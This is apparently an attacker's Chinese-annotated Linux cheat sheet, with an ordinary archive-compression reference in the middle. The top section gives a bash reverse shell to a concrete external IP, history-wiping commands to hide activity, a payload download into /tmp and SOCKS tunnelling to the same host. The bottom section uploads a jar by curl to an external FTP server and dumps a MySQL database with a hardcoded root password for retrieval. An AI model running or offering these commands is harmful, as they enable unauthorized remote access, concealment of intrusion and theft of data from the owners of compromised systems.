python -m SimpleHTTPServer 开启临时端口
ps -ef| grep python 查看应用进程
kill -9 id 强制关闭进程
netstat -auo
列出所有 tcp 端口 netstat -at
列出所有 udp 端口 netstat -au
ifconfig 查看网卡信息
w 查看管理员在线情况
last 最近100条管理员登陆记录
contrab -a 查看计划任务
pwd 查看当前目录
id 查看用户权限
chmod 777 文件名 赋予文件权限
uname -a 查看内核
python -c "import pty;pty.spawn('/bin/bash')" 获取交互式shell
bash -i >& /dev/tcp/103.56.19.57/8062 0>&1    反弹shell
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0;export HISTFILESIZE=0 不记录命令
wget -O /tmp/1.py http://103.xx.xx.xx:8090/1.py wget命令
./64 -s rcsocks -l 8001 -e 8002
./64 -s rssocks -d 103.56.19.57 -e 8002   端口转发
ping -c 10 192.168.120.206 ping指定次数
----------------------------------------------------------------------
.tar
解包：tar xvf FileName.tar
打包：tar cvf FileName.tar DirName
.gz
解压1：gunzip FileName.gz
解压2：gzip -d FileName.gz
压缩：gzip FileName
.tar.gz 和 .tgz
解压：tar zxvf FileName.tar.gz
压缩：tar zcvf FileName.tar.gz DirName
.bz2
解压1：bzip2 -d FileName.bz2
解压2：bunzip2 FileName.bz2
压缩： bzip2 -z FileName
.tar.bz2
解压：tar jxvf FileName.tar.bz2
压缩：tar jcvf FileName.tar.bz2 DirName
.bz
解压1：bzip2 -d FileName.bz
解压2：bunzip2 FileName.bz
.tar.bz
解压：tar jxvf FileName.tar.bz
.Z
解压：uncompress FileName.Z
压缩：compress FileName
.tar.Z
解压：tar Zxvf FileName.tar.Z
压缩：tar Zcvf FileName.tar.Z DirName
.zip
解压：unzip FileName.zip
压缩：zip FileName.zip DirName
.rar
解压：rar x FileName.rar
压缩：rar a FileName.rar DirName
.lha
解压：lha -e FileName.lha
压缩：lha -a FileName.lha FileName
.rpm
解包：rpm2cpio FileName.rpm | cpio -div
语法：gzip [选项] 压缩（解压缩）的文件名该命令的各选项含义如下：
-c 将输出写到标准输出上，并保留原有文件。-d 将压缩文件解压。
---------------------------------------------------------------
curl -T app.jar ftp://185.243.41.216/

mysqldump -uroot -pfda4da7295f11da1 --databases guess >/tmp/guess.sql 
mv /tmp/guess.sql 
下载回来文件 curl -o guess.sql https://www/妈的目录/guess.sql
